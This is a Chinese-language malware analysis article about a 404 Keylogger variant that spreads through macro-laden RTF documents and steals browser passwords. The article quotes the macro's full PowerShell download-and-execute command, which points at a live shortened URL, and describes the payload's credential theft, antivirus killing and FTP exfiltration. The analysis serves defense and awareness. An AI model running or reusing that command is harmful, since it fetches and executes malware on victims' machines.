信息來(lái)源：FreeBuf

近日，研究人員捕獲到一個(gè)最新的404 Keylogger木馬變種，通過(guò)OFFICE文檔嵌入惡意宏代碼進(jìn)行傳播，盜取受害者瀏覽器的網(wǎng)站帳號(hào)和密碼，深信服安全團(tuán)隊(duì)對(duì)此樣本進(jìn)行了詳細(xì)分析，并獲取到了黑客FTP服務(wù)器的帳號(hào)和密碼，請(qǐng)大家提高安全意識(shí)，不要輕易打開未知的郵件附件及文檔等。

樣本是一個(gè)RTF文檔，里面嵌套了OLE對(duì)象，包含惡意宏代碼，如下所示：

惡意宏代碼，會(huì)啟動(dòng)PowerShell進(jìn)程，從遠(yuǎn)程服務(wù)器上下載惡意程序，然后執(zhí)行，相關(guān)參數(shù)，如下：

powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7 ” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”

分析下載的惡意程序，使用NET語(yǔ)言進(jìn)行開發(fā)，首先會(huì)獲取遠(yuǎn)程服務(wù)器地址：hxxps://paste.ee/r/RrkBF，如下所示：

讀取遠(yuǎn)程服務(wù)器上的內(nèi)容，如下所示：

直接加載執(zhí)行遠(yuǎn)程服務(wù)器上的腳本，如下所示：

解密去混淆遠(yuǎn)程服務(wù)器上的腳本之后，同樣是一個(gè)NET編寫的程序，如下所示：

該程序主要功能是鍵盤記錄，盜取受害者瀏覽器網(wǎng)站上的帳號(hào)和密碼，會(huì)結(jié)束受害者主機(jī)上的瀏覽器相關(guān)進(jìn)程，如下所示：

對(duì)抗殺軟，結(jié)束相關(guān)安全軟件進(jìn)程，相關(guān)的安全軟件進(jìn)程有一百多個(gè)，如下所示：

將記錄的瀏覽器上網(wǎng)站，以及相關(guān)的帳號(hào)和密碼，然后發(fā)送到黑客遠(yuǎn)程FTPd服務(wù)器，如下所示：

該惡意程序還有截屏等操作，在分析該惡意程序的時(shí)候發(fā)現(xiàn)了黑客的FTP服務(wù)器地址，以及帳號(hào)和密碼，登錄進(jìn)去，發(fā)現(xiàn)它已經(jīng)盜取了部分受害者的主機(jī)信息，如下所示：